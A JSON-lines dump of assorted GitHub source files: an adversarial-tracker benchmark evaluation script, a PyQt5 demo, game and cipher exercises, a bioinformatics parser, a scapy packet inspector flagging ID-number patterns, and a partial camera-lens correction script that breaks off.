'/pix2pix')\n from options.test_options0 import TestOptions\n from models import create_model\n import os\n\n opt = TestOptions().parse()\n\n # this is dummy tracker name\n opt.tracker_name = \"dimp\"\n opt.istargeted = False\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n opt.model = 'G_template_L2_500_regress'\n opt.netG = 'unet_128'\n expcase, model_epoch, opt.eps = args.case, args.model_iter, args.eps\n\n ckpt = os.path.join(ckpt_root_dir,\n 'checkpoints/{}_{}/{}'.format(opt.model, expcase, model_epoch))\n print(\"Loading generator trained with TTA approach\")\n\n GAN = create_model(opt)\n print(\"generator checkpoint path:\", ckpt)\n GAN.load_path = ckpt\n GAN.setup(opt)\n GAN.eval()\n return GAN, expcase, attack_method\n\n\nGAN, expcase, attack_method = load_generator()\n\n\ndef main():\n # load config\n cfg.merge_from_file(args.config)\n\n # hp_search\n params = getattr(cfg.HP_SEARCH, args.dataset)\n hp = {'lr': params[0], 'penalty_k': params[1], 'window_lr': params[2]}\n\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n dataset_root = os.path.join(cur_dir, '../../testing_dataset', args.dataset)\n\n model = ModelBuilder()\n\n # load model\n model = load_pretrain(model, args.snapshot).cuda().eval()\n\n # build tracker\n tracker = SiamCARTracker(model, cfg.TRACK)\n\n # create dataset\n dataset = DatasetFactory.create_dataset(name=args.dataset,\n dataset_root=dataset_root,\n load_img=False)\n\n model_name = args.snapshot.split('/')[-1]\n\n total_lost = 0\n\n mean_FPS = []\n\n if args.dataset in ['VOT2016', 'VOT2018', 'VOT2019']:\n # restart tracking\n for v_idx, video in enumerate(dataset):\n if args.video != '':\n # test one special video\n if video.name != args.video:\n continue\n frame_counter = 0\n lost_number = 0\n toc = 0\n pred_bboxes = []\n for idx, (img, gt_bbox) in enumerate(video):\n if len(gt_bbox) == 4:\n gt_bbox = [gt_bbox[0], gt_bbox[1],\n gt_bbox[0], gt_bbox[1] + gt_bbox[3] - 1,\n gt_bbox[0] + gt_bbox[2] - 1, gt_bbox[1] + gt_bbox[3] - 1,\n gt_bbox[0] + gt_bbox[2] - 1, gt_bbox[1]]\n tic = cv2.getTickCount()\n if idx == frame_counter:\n cx, cy, w, h = get_axis_aligned_bbox(np.array(gt_bbox))\n gt_bbox_ = [cx - (w - 1) / 2, cy - (h - 1) / 2, w, h]\n tracker.init(img, gt_bbox_)\n pred_bbox = gt_bbox_\n pred_bboxes.append(1)\n\n if idx == 0 and args.vis:\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n w, h = img.shape[:2]\n video_out = cv2.VideoWriter(os.path.join(\n \"./viz/\", video.name + \".avi\"), fourcc, fps=20, frameSize=(h, w))\n\n elif idx > frame_counter:\n\n # outputs = tracker.track(img, hp)\n outputs = tracker.track_advT(img, hp, GAN, 1, frame_id=idx)\n\n pred_bbox = outputs['bbox']\n overlap = vot_overlap(pred_bbox, gt_bbox, (img.shape[1], img.shape[0]))\n if overlap > 0:\n # not lost\n pred_bboxes.append(pred_bbox)\n else:\n # lost object\n pred_bboxes.append(2)\n frame_counter = idx + 5 # skip 5 frames\n lost_number += 1\n else:\n pred_bboxes.append(0)\n toc += cv2.getTickCount() - tic\n\n if args.vis and idx > frame_counter:\n cv2.polylines(img, [np.array(gt_bbox, np.int).reshape((-1, 1, 2))],\n True, (0, 255, 0), 3)\n bbox = list(map(int, pred_bbox))\n cv2.rectangle(img, (bbox[0], bbox[1]),\n (bbox[0] + bbox[2], bbox[1] + bbox[3]), (0, 255, 255), 3)\n cv2.putText(img, str(idx), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n cv2.putText(img, str(lost_number), (40, 80), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n video_out.write(img)\n toc /= cv2.getTickFrequency()\n\n if args.vis:\n video_out.release()\n\n if args.attack_universal:\n video_path = os.path.join('results_Universal_{}_{}'.format(\n attack_method, expcase), args.dataset, model_name, 'baseline', video.name)\n else:\n video_path = os.path.join('results_TD_{}_{}'.format(attack_method, expcase),\n args.dataset, model_name, 'baseline', video.name)\n\n # save results\n # video_path = os.path.join('results_{}_{}'.format(attack_method, expcase), args.dataset, model_name,\n # 'baseline', video.name)\n if not os.path.isdir(video_path):\n os.makedirs(video_path)\n result_path = os.path.join(video_path, '{}_001.txt'.format(video.name))\n with open(result_path, 'w') as f:\n for x in pred_bboxes:\n if isinstance(x, int):\n f.write(\"{:d}\\n\".format(x))\n else:\n f.write(','.join([vot_float2str(\"%.4f\", i) for i in x]) + '\\n')\n print('({:3d}) Video: {:12s} Time: {:4.1f}s Speed: {:3.1f}fps Lost: {:d}'.format(\n v_idx + 1, video.name, toc, idx / toc, lost_number))\n total_lost += lost_number\n print(\"{:s} total lost: {:d}\".format(model_name, total_lost))\n\n else:\n\n # OPE tracking\n for v_idx, video in enumerate(dataset):\n if args.video != '':\n # test one special video\n if video.name != args.video:\n continue\n toc = 0\n pred_bboxes = []\n track_times = []\n for idx, (img, gt_bbox) in enumerate(video):\n tic = cv2.getTickCount()\n if idx == 0:\n cx, cy, w, h = get_axis_aligned_bbox(np.array(gt_bbox))\n gt_bbox_ = [cx - (w - 1) / 2, cy - (h - 1) / 2, w, h]\n tracker.init(img, gt_bbox_)\n pred_bbox = gt_bbox_\n pred_bboxes.append(pred_bbox)\n\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n w, h = img.shape[:2]\n\n if args.vis:\n if not os.path.isdir(\"./viz/\"):\n os.makedirs(\"./viz/\")\n video_out = cv2.VideoWriter(os.path.join(\n \"./viz/\", video.name + \".avi\"), fourcc, fps=20, frameSize=(h, w))\n else:\n\n # outputs = tracker.track(img, hp)\n outputs = tracker.track_advT(img, hp, GAN, 1, frame_id=idx)\n\n pred_bbox = outputs['bbox']\n pred_bboxes.append(pred_bbox)\n toc += cv2.getTickCount() - tic\n track_times.append((cv2.getTickCount() - tic) / cv2.getTickFrequency())\n\n # if idx == 0:\n # cv2.destroyAllWindows()\n if args.vis and idx > 0:\n if not any(map(math.isnan, gt_bbox)):\n gt_bbox = list(map(int, gt_bbox))\n pred_bbox = list(map(int, pred_bbox))\n cv2.rectangle(img, (gt_bbox[0], gt_bbox[1]),\n (gt_bbox[0] + gt_bbox[2], gt_bbox[1] + gt_bbox[3]), (0, 255, 0), 3)\n cv2.rectangle(img, (pred_bbox[0], pred_bbox[1]),\n (pred_bbox[0] + pred_bbox[2], pred_bbox[1] + pred_bbox[3]), (0, 255, 255), 3)\n cv2.putText(img, str(idx), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n video_out.write(img)\n toc /= cv2.getTickFrequency()\n\n if args.vis:\n video_out.release()\n\n if args.attack_universal:\n\n results_dir = 'results_Universal_{}_{}'.format(\n attack_method, expcase)\n\n model_path = os.path.join('results_Universal_{}_{}'.format(\n attack_method, expcase), args.dataset, model_name)\n else:\n\n results_dir = 'results_TD_{}_{}'.format(\n attack_method, expcase)\n\n model_path = os.path.join('results_TD_{}_{}'.format(\n attack_method, expcase), args.dataset, model_name)\n\n if not os.path.isdir(model_path):\n os.makedirs(model_path)\n result_path = os.path.join(model_path, '{}.txt'.format(video.name))\n with open(result_path, 'w') as f:\n for x in pred_bboxes:\n f.write(','.join([str(i) for i in x]) + '\\n')\n\n mean_FPS.append(idx / toc)\n\n print('({:3d}) Video: {:12s} Time: {:5.1f}s Speed: {:3.1f}fps, Mean Speed: {:3.1f}'.format(\n v_idx + 1, video.name, toc, idx / toc, np.mean(mean_FPS)))\n\n result = subprocess.call(\n [\"sh\", \"-c\", \" \".join(\n ['python', '-W ignore', 'eval.py', '--tracker_path', results_dir, '--dataset', args.dataset,\n '--tracker_prefix', 'model_general'])])\n\n os.chdir(model_path)\n save_file = '../%s' % dataset\n shutil.make_archive(save_file, 'zip')\n print('Records saved at', save_file + '.zip')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"krishnakanthnakka/TTAttack","sub_path":"SiamCAR/tools/test_attack_ours.py","file_name":"test_attack_ours.py","file_ext":"py","file_size_in_byte":11798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"37030165327","text":"import PyQt5.QtWidgets as qtw\nimport PyQt5.QtGui as qtg\n\n\nclass MainWindow(qtw.QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Hi There\")\n self.setLayout(qtw.QVBoxLayout())\n # label\n my_label = qtw.QLabel(\"pick sth mf\")\n my_label.setFont(qtg.QFont('Helvetica',24))\n self.layout().addWidget(my_label) \n\n # Create a button \n my_button = qtw.QPushButton(\"I dare u\",\n clicked = lambda: press_it())\n self.layout().addWidget(my_button)\n # ## Create an Combo box\n # my_combo = qtw.QComboBox(self,\n # editable=True,insertPolicy=qtw.QComboBox.InsertAtBottom)\n # # Add Items to the Combo Box\n # my_combo.addItem(\"IDGAF \",qtw.QWidget)\n # my_combo.addItem(\"IDGAF \",\"f off\")\n # my_combo.addItem(\"IDGAF\",5)\n # my_combo.addItem(\"IDGAF\")\n\n # self.layout().addWidget(my_combo)\n # this makes the magic appear \n\n\n # Create Spin Bpx\n my_spin = qtw.QSpinBox(self,value=10,maximum=100,minimum=0,singleStep=5,prefix=\"#\",suffix=' order')\n # Change font size of spin box\n my_spin.setFont(qtg.QFont('Helvetica',18))\n self.layout().addWidget(my_spin)\n\n\n\n self.show()\n\n def press_it():\n my_label.setText(f'You Picked {my_spin.value()}')\n\n\n # ADd name to label\n # my_label.setText(f'You Picked {my_combo.currentData()}')\n # my_label.setText(f'You Picked {my_combo.currentText()}')\n # my_label.setText(f'You Picked {my_combo.currentIndex()}')\n\napp =qtw.QApplication([])\nmw =MainWindow()\napp.exec_()\n\n\n\n\n\n\n\n# import PyQt5.QtWidgets as qtw\n# import PyQt5.QtGui as qtg\n\n# class MainWindow(qtw.QWidget):\n# def __init__(self):\n# super().__init__()\n# # Add a title\n# self.setWindowTitle(\"hello world\") \n\n# # Set Vertical layout\n# self.setLayout(qtw.QVBoxLayout()) \n# # Create A Label\n# my_label =qtw.QLabel(\"Hello There\")\n# my_label.setFont(qtg.QFont('Helvetica',18))\n# self.layout().addWidget(my_label)\n# # Create an entry\n # my_entry = qtw.QLineEdit()\n # my_entry.setObjectName(\"ma,e_field\")\n # my_entry.setText('')\n# self.layout().addWidget(my_entry)\n # # Create a button \n # my_button = qtw.QPushButton(\"I dare u\",\n # clicked = lambda: press_it())\n # self.layout().addWidget(my_button)\n# self.show()\n# def press_it():\n# # ADd name to label\n# my_label.setText(f'Hello {my_entry.text()}')\n# # Clear entry\n# my_entry.setText(\"\")\n\n# app = qtw.QApplication([])\n# mw =MainWindow()\n\n# app.exec_()","repo_name":"MominRaza/assets","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"71335156395","text":"import random\n\nfish_property = {\n \"shark1\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\":3,\"speedRange\":1.1,\"captureProbability\":0.05,\"coinLevel\":2,\"multiple\":10},\n \"fish1\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\":1,\"speedRange\":2,\"captureProbability\":0.7,\"coinLevel\":1,\"multiple\":1},\n \"fish2\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\":1,\"speedRange\":2,\"captureProbability\":0.6,\"coinLevel\":1,\"multiple\":2},\n \"fish3\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\": 1.5, \"speedRange\": 2, \"captureProbability\": 0.5, \"coinLevel\": 1,\"multiple\":3},\n \"fish4\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\": 2, \"speedRange\": 1, \"captureProbability\": 0.4, \"coinLevel\": 1,\"multiple\":4},\n \"fish5\":{\"imageLenth\" : 8,\"swimmingLength\":4,\"baseSpeed\": 1.2, \"speedRange\": 2.1, \"captureProbability\": 0.35, \"coinLevel\": 1,\"multiple\":5},\n \"fish6\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\": 1.4, \"speedRange\": 1, \"captureProbability\": 0.3, \"coinLevel\": 2,\"multiple\":1},\n \"fish7\":{\"imageLenth\" : 10,\"swimmingLength\":6,\"baseSpeed\": 1, \"speedRange\": 4, \"captureProbability\": 0.25, \"coinLevel\": 2,\"multiple\":2},\n \"fish8\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\": 2.2, \"speedRange\": 1, \"captureProbability\": 0.2, \"coinLevel\": 2,\"multiple\":3},\n \"fish9\":{\"imageLenth\" : 12,\"swimmingLength\":8,\"baseSpeed\": 1.2, \"speedRange\": 3, \"captureProbability\": 0.15, \"coinLevel\": 2,\"multiple\":4},\n \"fish10\":{\"imageLenth\" : 10,\"swimmingLength\":6,\"baseSpeed\": 1, \"speedRange\": 2, \"captureProbability\": 0.1, \"coinLevel\": 2,\"multiple\":5}\n}\n\nkknd = 'sdsdsd'\n\nkknd2 = 'sdsdsdsd'\n\nclass A:\n pass\n\ndef dosometing():\n print(kknd)\n\nis_left = True if random.randint(0,2) == 0 else False\n\ncannons = [ i for i in range(1,8) ]\nprint(cannons)\n\nprint(random.random())","repo_name":"syuyuusyu/py_fish","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"891632228","text":"import pandas as pd\nimport argparse\nimport os\n\n\ndesctiptionStr = '''\nExtract and de-replicate PANTHER ID for PANTHER analysis (Overrepresentation)\n\nOutput:\n\ncol 1: sequence ID\ncol 2: PANTHER accession (PTHRnnnnn for family HMMs, PTHRnnnnn:SFnn for subfamilies)\n\n\n'''\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Extract and de-replicate GO terms for BiNGO reference')\n parser.add_argument('path', help=\"path to interproscan output. needs '-appl PANTHER'\")\n parser.add_argument('--species', help='species', default='Not_set')\n parser.add_argument(\n '--curator', help='curator, generator of the annotation', default='Not_set')\n args = parser.parse_args()\n interproscanOutTsv = args.path.strip()\n species = args.species\n curator = args.curator\n convertedFile = f'{os.path.splitext(interproscanOutTsv)[0]}_pantherRef.tsv'\n source = pd.read_csv(interproscanOutTsv, sep='\\t', header=None, usecols=range(9), index_col=None)\n # print(source.head(10))\n corrdict = {} # id:panacc\n for i,r in source.iterrows():\n proid = r[0]\n if proid not in corrdict:\n corrdict[proid] = [\"-\", \"-\"] # retrieve none mapped for further notice\n if r[3] != \"PANTHER\":\n continue\n panacc = r[4]\n alrange = f\"{r[6]}-{r[7]}\"\n if proid in corrdict and corrdict[proid][0] != \"-\":\n if ':' in panacc:\n if ':' in corrdict[proid][0] and panacc != corrdict[proid][0]:\n print('EXCEPTION:')\n print(f'{proid}: {corrdict[proid][0]}[{corrdict[proid][1]}], {panacc}[{alrange}]')\n exit()\n else:\n corrdict[proid] = [panacc, alrange]\n elif ':' not in corrdict[proid][0] and panacc != corrdict[proid][0]:\n print('EXCEPTION:')\n print(f'{proid}: {corrdict[proid][0]}[{corrdict[proid][1]}], {panacc}[{alrange}]')\n exit()\n else:\n corrdict[proid] = [panacc, alrange]\n with open(convertedFile, 'w') as writer:\n for proid in corrdict:\n if corrdict[proid][0] != '-': # PANTHER does not accept none mapped\n writer.write(\"\\t\".join([proid,corrdict[proid][0]]))\n writer.write('\\n')\n\n print(convertedFile)\n","repo_name":"snail123815/BIO_tools","sub_path":"For_other_tools/parse_interproscann_go_annotation_panther.py","file_name":"parse_interproscann_go_annotation_panther.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19996585205","text":"import random\n\ni = 0\nplayer_count = 0\ncomputer_count = 0\nwhile i <= 2:\n player = int(input(\"1==石头,2==剪刀,3==布\"))\n computer = random.randint(1, 3)\n i += 1\n if player == 1 and computer == 2 or player == 2 and computer == 3 or player == 3 and computer == 1:\n print(\"玩家获胜\")\n player_count += 1\n elif player == 1 and computer == 3 or player == 2 and computer == 1 or player == 3 and computer == 2:\n print(\"电脑获胜\")\n computer_count += 1\n else:\n print(\"双方平局\")\nif player_count > computer_count:\n print(\"玩家获胜\")\nelif player_count < computer_count:\n print(\"电脑获胜\")\nelse:\n print(\"双方平局\")\n","repo_name":"HDIKhongdou/python","sub_path":"project/循环/猜拳三局两胜.py","file_name":"猜拳三局两胜.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74466710359","text":"\"\"\"Write a program that can perform the Caesar Cipher for english messages that\ninclude both upper- and lowercase characters\"\"\"\n\nclass CaesarCipher:\n \"\"\"Class for doing encryption and decryption using a Caesar cipher.\"\"\"\n\n def __init__(self, shift):\n \"\"\"Construct Caesar cipher using given integer shift for rotation.\"\"\"\n encoder_upper = [None] * 26 # temp array for encryption\n decoder_upper = [None] * 26 # temp array for decryption\n encoder_lower = [None] * 26 # temp array for encryption\n decoder_lower = [None] * 26 # temp array for decryption\n \n for k in range(26):\n encoder_upper[k] = chr((k + shift) % 26 + ord('A'))\n decoder_upper[k] = chr((k - shift) % 26 + ord('A'))\n encoder_lower[k] = chr((k + shift) % 26 + ord('a'))\n decoder_lower[k] = chr((k - shift) % 26 + ord('a'))\n self._forward = []\n self._backward = []\n self._forward.append(''.join(encoder_upper)) # will store as string\n self._forward.append(''.join(encoder_lower)) # will store as string\n self._backward.append(''.join(decoder_upper)) # since fixed\n self._backward.append(''.join(decoder_lower)) # since fixed\n print(self._forward)\n print(self._backward)\n def encrypt(self, message):\n \"\"\"Return string representing encripted message.\"\"\"\n return self._transform(message, self._forward)\n\n def decrypt(self, secret):\n \"\"\"Return decrypted message given encrypted secret.\"\"\"\n return self._transform(secret, self._backward)\n\n def _transform(self, original, code):\n \"\"\"Utility to perform transformation based on given code string.\"\"\"\n msg = list(original)\n for k in range(len(msg)):\n if msg[k].isupper():\n j = ord(msg[k]) - ord('A') # index from 0 to 25\n msg[k] = code[0][j] # replace this character\n if msg[k].islower():\n j = ord(msg[k]) - ord('a') # index from 0 to 25\n msg[k] = code[1][j] # replace this character\n return ''.join(msg)\n\nif __name__ == '__main__':\n\n cipher = CaesarCipher(3)\n message = \"THE Eagle IS IN pLAY; MEET AT JOE'S.\"\n coded = cipher.encrypt(message)\n print('Secret: ', coded)\n answer = cipher.decrypt(coded)\n print('Message:', answer)\n","repo_name":"franciscomunoz/pyAlgoBook","sub_path":"chap5-Array-Based_Sequences/P-5.34.py","file_name":"P-5.34.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42912611812","text":"import re\nfrom datetime import datetime\nfrom scapy.all import sniff\nfrom scapy.config import conf\nconf.use_pcap = True\n\ndef validate_date(text):\n \n try:\n datetime.strptime(text, '%y%m%d')\n except ValueError:\n return False\n return True\n\n\ndef find_ids(payload):\n\n ids = re.findall(r\"(\\d{6})-\\d{7}\", payload)\n contains_id = False\n for id in ids:\n if (validate_date(id)):\n print(\"This packet contains sensetive data!!\")\n return\n print(\"This is a normal packet\")\n\n\ndef packet_callback(packet):\n \n print(packet.show())\n find_ids(str(packet.payload))\n\n\nprint(\"Start sniffing...\")\nsniff(filter=\"udp port 4789\", prn=packet_callback)\n\n\n","repo_name":"song4evr/trashbox","sub_path":"mirroring_capture.py","file_name":"mirroring_capture.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30930660480","text":"#!/usr/bin/python3\nimport subprocess\nimport os\nimport shutil\nimport sys\nimport csv\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nENABLE_CA_AND_DISTORTION = False\n\nIMAGE_WIDTH = 6000\nIMAGE_HEIGHT = 4000\nIMAGE_DIAGONAL = (IMAGE_WIDTH**2 + IMAGE_HEIGHT**2)**0.5\n\nCORRECT_DISTORTION = True\n\ndef check_if_distortion_corrections_needed(exifstring):\n split = exifstring.split(' ')[1:]\n com_errors = np.array([float(txt) for txt in split[9:17]])\n return sum(np.abs(com_errors)) > 0.1\n\ndef check_if_ca_corrections_needed(castring):\n split = castring.split(' ')[1:]\n com_errors = np.array([float(txt) for txt in split[9:27]])\n return sum(np.abs(com_errors)) > 0.000001\n\n\ndef distortioncalc(exifstring, castring):\n # GEOEXAMPLE = \"400.5555556 0.3535211268 0.5 0.6126760563 0.7070422535 0.7908450704 0.8661971831 0.9352112676 1 1.06056338 -1.172515869 -2.354660034 -3.458114624 -4.434677124 -5.274719238 -5.918792725 -6.328369141 -6.426345825 -6.42634582\"\n # CAEXAMPLE = \"400.5555556 0.3535211268 0.5 0.6126760563 0.7070422535 0.7908450704 0.8661971831 0.9352112676 1 1.06056338 -3.051757812e-05 -9.155273438e-05 -0.0001525878906 -0.0002136230469 -0.0002746582031 -0.0003356933594 -0.0004577636719 -0.0006103515625 -0.0006103515625 0.0007019042969 0.0007934570312 0.0008850097656 0.0009460449219 0.001037597656 0.001129150391 0.001220703125 0.001434326172 0.001434326172 400.5555556\"\n\n # exifstring = GEOEXAMPLE\n # castring = CAEXAMPLE\n max_height = (3**2+2**2)**0.5 / 2.0\n usepoints = 8\n split = castring.split(' ')[1:]\n rb_heights = np.array([float(txt) for txt in split[:usepoints]]) * (3**2+2**2)**0.5 / 2.0\n red_errors = np.array([float(txt) for txt in split[9:9+usepoints]]) #* -1\n blue_errors = np.array([float(txt) for txt in split[18:18+usepoints]]) #* - 1\n\n if exifstring is None:\n com_heights = rb_heights\n com_errors = np.zeros(com_heights.shape)\n else:\n split = exifstring.split(' ')[1:]\n com_heights = np.array([float(txt) for txt in split[:usepoints]]) * max_height\n com_errors = np.array([float(txt) for txt in split[9:9+usepoints]])\n print(com_errors)\n bother = sum(np.abs(com_errors)) > 0.1\n\n green_multipliers = com_errors * 0.01 + 1.0\n red_multipliers = (red_errors * 1 + 1.0) * green_multipliers\n blue_multipliers = (blue_errors * 1 + 1.0) * green_multipliers\n\n for a, b in zip(com_heights, rb_heights):\n assert a == b\n\n # plt.plot(com_heights, com_errors, '.')\n # plt.plot(rb_heights, red_errors*100, '.', color='red')\n # plt.plot(rb_heights, blue_errors*100, '.', color='blue')\n # plt.show()\n # exit()\n green_coeff = np.polyfit(com_heights, green_multipliers, 3)\n cosum = sum(green_coeff)\n scaling = 1.0 / cosum\n green_coeff = green_coeff * scaling\n red_coeff = np.polyfit(com_heights, red_multipliers, 3) * scaling\n blue_coeff = np.polyfit(com_heights, blue_multipliers, 3) * scaling\n\n # plt.plot(com_heights, (red_multipliers / green_multipliers - 1) * 10000, color='red')\n # plt.plot(com_heights, (blue_multipliers / green_multipliers - 1) * 10000, color='blue')\n # plt.show()\n # exit()\n\n # plt.plot(com_heights, green_multipliers,'.')\n # plt.plot(rb_heights, red_multipliers,'.', color='red')\n # plt.plot(rb_heights, blue_multipliers,'.', color='blue')\n # plt.ylim(green_multipliers[-2]-0.0001, green_multipliers[-2]+0.0001)\n # plt.show()\n\n alter = np.array((1.0, 1.0, 1.0, min(1.0, 1.0 / green_multipliers[-1])))\n\n greenlst = [\"{:.5f}\".format(_) for _ in list(green_coeff*alter)[:]]\n redlst = [\"{:.5f}\".format(_) for _ in list(red_coeff*alter)[:]]\n bluelst = [\"{:.5f}\".format(_) for _ in list(blue_coeff*alter)[:]]\n #\n green_geostring = \" \".join(greenlst)\n red_geostring = \" \".join(redlst)\n blue_geostring = \" \".join(bluelst)\n\n print(\"Geometric distortion coefficients (RGB):\")\n print(red_geostring)\n print(green_geostring)\n print(blue_geostring)\n # exit()\n # plt.plot(heights, multipliers)\n # plt.show()\n return red_geostring, green_geostring, blue_geostring, bother\n\n# distortioncalc(\"\", \"\")\n# exit()\nrandom_number = random.randint(1,9999)\nWORKING_DIR = \"/home/sam/mtfmapper_temp{}/\".format(random_number)\ntry:\n os.mkdir(WORKING_DIR)\nexcept FileExistsError:\n pass\n\n\nargv = sys.argv\n\ntry:\n startfile = int(argv[1])\nexcept ValueError:\n startfile = -1\n\nfor arg in argv[1:]:\n try:\n processpath = os.path.abspath(arg)\n except FileNotFoundError:\n continue\n\n process_subdir = os.path.join(processpath, \"mtfm3\")\n process_subdir_ca = os.path.join(processpath, \"mtfm4\")\n process_subdir_fullcorr = os.path.join(processpath, \"mtfm5\")\n print(\"Processing path {}\".format(processpath))\n\n try:\n os.mkdir(process_subdir)\n except FileExistsError:\n pass\n try:\n os.mkdir(process_subdir_ca)\n except FileExistsError:\n pass\n try:\n os.mkdir(process_subdir_fullcorr)\n except FileExistsError:\n pass\n\n dirlist = os.scandir(processpath)\n\n for entry in dirlist:\n if entry.name[-3:].upper() != \"RAF\":\n continue\n entrynumber = int(\"\".join([s for s in entry.name if s.isdigit()]))\n if entrynumber < startfile:\n continue\n\n # if entrynumber != 10:\n # continue\n\n # Check for existing results\n new_txtfilepath = os.path.join(process_subdir, \"{}.no_corr.sfr\".format(entry.name))\n new_txtfilepath_ca = os.path.join(process_subdir_ca, \"{}.ca_only.sfr\".format(entry.name))\n new_txtfilepath_fullcorr = os.path.join(process_subdir_fullcorr, \"{}.ca_and_distortion.sfr\".format(entry.name))\n\n new_esf_filepath = os.path.join(process_subdir, \"{}.no_corr.esf\".format(entry.name))\n new_esf_filepath_ca = os.path.join(process_subdir_ca, \"{}.ca_only.esf\".format(entry.name))\n new_esf_filepath_fullcorr = os.path.join(process_subdir_fullcorr, \"{}.ca_and_distortion.esf\".format(entry.name))\n\n print(\"Processing file {}\".format(entry.name))\n\n # Process RAF exif\n exif = subprocess.check_output([\"exiftool\", entry.path])\n exiflines = [line.decode(encoding='utf-8', errors='strict') for line in exif.splitlines()]\n\n aperture = \"\"\n focal_length = \"\"\n lens_model = \"\"\n max_aperture = \"\"\n distortionexif = \"\"\n ca_exif = []\n\n exifpath = os.path.join(process_subdir, entry.name + \".exif.csv\")\n exifpath_ca = os.path.join(process_subdir_ca, entry.name + \".exif.csv\")\n exifpath_fullcorr = os.path.join(process_subdir_fullcorr, entry.name + \".exif.csv\")\n\n if os.path.exists(exifpath):\n os.remove(exifpath)\n with open(exifpath, 'w') as file:\n writer = csv.writer(file, delimiter=\",\", quotechar=\"|\")\n for line in exiflines:\n tag, value = [s.strip() for s in line.split(\":\", 1)]\n writer.writerow([tag, value])\n # print(tag, value)\n if tag == \"Aperture\":\n aperture = value\n elif tag == \"Focal Length\" and \"equivalent\" not in value:\n focal_length = value\n elif tag == \"Lens Model\":\n lens_model = value\n elif tag == \"Max Aperture Value\":\n max_aperture = value\n elif tag == \"Geometric Distortion Params\":\n distortionexif = value\n elif tag == \"Chromatic Aberration Params\":\n ca_exif = value\n print(\"Lens Model {}, Aperture {}, Focal Length {}\".format(lens_model, aperture, focal_length))\n\n if ENABLE_CA_AND_DISTORTION:\n distorted = check_if_distortion_corrections_needed(distortionexif)\n caed = check_if_ca_corrections_needed(ca_exif)\n else:\n distorted = False\n caed = False\n\n print(ca_exif)\n if caed:\n print(\"Lens has LaCA correction in EXIF\")\n else:\n print(\"Lens does not need LaCA correction\")\n if distorted:\n print(\"Lens has distortion correction in EXIF\")\n else:\n print(\"Lens does not need distortion correction\")\n\n if (os.path.exists(new_txtfilepath) and\n (os.path.exists(new_txtfilepath_ca) or not caed) and\n (os.path.exists(new_txtfilepath_fullcorr) or not distorted) and\n os.path.exists(new_esf_filepath) and\n (os.path.exists(new_esf_filepath_ca) or not caed) and\n (os.path.exists(new_esf_filepath_fullcorr) or not distorted)):\n print(\"{} appears to already exist, skipping processing\".format(new_txtfilepath))\n continue\n if caed:\n if os.path.exists(exifpath_ca):\n os.remove(exifpath_ca)\n shutil.copy(exifpath, exifpath_ca) # Copy exif to results dir\n if distorted:\n if os.path.exists(exifpath_fullcorr):\n os.remove(exifpath_fullcorr)\n shutil.copy(exifpath, exifpath_fullcorr) # Copy exif to results dir\n\n # Symlink RAF file to working directory\n linked_raw_path = os.path.join(WORKING_DIR, entry.name)\n try:\n os.remove(linked_raw_path)\n except FileNotFoundError:\n pass\n print(\"Linking {} -> {}\".format(entry.path, linked_raw_path))\n os.symlink(entry.path, linked_raw_path)\n\n # Prepare to process raw\n uncorrected_image_path = linked_raw_path + \".tiff\"\n try:\n os.remove(uncorrected_image_path)\n print(\"Removed exising demosaiced image\")\n except FileNotFoundError:\n pass\n print(\"Calling Libraw dcraw_emu to demosaic...\")\n output = subprocess.check_output([\"/home/sam/LibRaw-0.19.2/bin/dcraw_emu\", \"-4\", \"-a\",\n \"-T\", \"-W\", linked_raw_path]) #\"-o\", \"0\", \"-M\",\n\n print(\"Running CA and maybe distortion correction loops...\")\n print()\n loops = [0]\n\n if caed:\n loops.append(1)\n if distorted:\n loops.append(2)\n for n in loops:\n if n == 0:\n print(\"Loop 1: No corrections\")\n elif n == 1:\n print(\"Loop 2: CA Corrections only\")\n if n >= 1:\n red, green, blue, bother = distortioncalc(None, ca_exif)\n if n == 2:\n red, green, blue, bother = distortioncalc(distortionexif, ca_exif)\n print(\"Loop 3: CA and distortion correction\")\n\n corrected_image_path = os.path.join(WORKING_DIR, entry.name + \".corrected.tiff\")\n\n channelpath = os.path.join(WORKING_DIR, entry.name+\".channel_%d.tiff\")\n\n redpath = os.path.join(WORKING_DIR, entry.name+\".channel_0.tiff\")\n greenpath = os.path.join(WORKING_DIR, entry.name+\".channel_1.tiff\")\n bluepath = os.path.join(WORKING_DIR, 